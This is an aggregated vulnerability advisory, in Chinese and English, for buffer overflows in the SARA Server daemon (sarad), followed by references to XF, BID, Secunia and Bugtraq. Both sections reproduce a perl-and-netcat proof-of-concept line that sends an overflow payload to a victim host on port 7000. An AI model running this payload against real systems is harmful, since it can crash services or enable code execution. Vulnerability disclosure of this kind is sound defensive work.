https://www.exploit-db.com/exploits/24386
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200408-203

SARAServer是BritishNational校园网的服务程序。SARAServer存在多个缓冲区溢出，远程攻击者可以利用这个漏洞可能以进程权限在系统上执行任意指令。提交类似如下的畸形请求，可导致程序发生缓冲区溢出：perl-e’print”SUCK”x11;printchrforeach(0x90，0xdb，0x14，0x40，0);’|netcatvictim7000精心构建提交数据可能以进程权限在系统上执行任意指令。

source: http://www.securityfocus.com/bid/10984/info

sarad is reported prone to a buffer overflow vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data.

A remote attacker can trigger the overflow condition by supplying a large string value to the application. Arbitrary code execution is possible in the context of the server.

In addition to this issue, it is reported that various other instances of potential buffer overflow and format string vulnerabilities exist throughout the application. These issues exist due to the use of strcpy() and sprintf functions. This BID will be updated upon further analysis.

perl -e 'print "SUCK" x 11; print chr foreach(0x90,0xdb,0x14,0x40,0);' | netcat victim 7000

来源:XF
名称:sara-server-bo(17060)
链接:http://xforce.iss.net/xforce/xfdb/17060
来源:BID
名称:10984
链接:http://www.securityfocus.com/bid/10984
来源:SECUNIA
名称:12348
链接:http://secunia.com/advisories/12348
来源:BUGTRAQ
名称:20040820Bufferoverflowinsarad
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=109308454122827&w;=2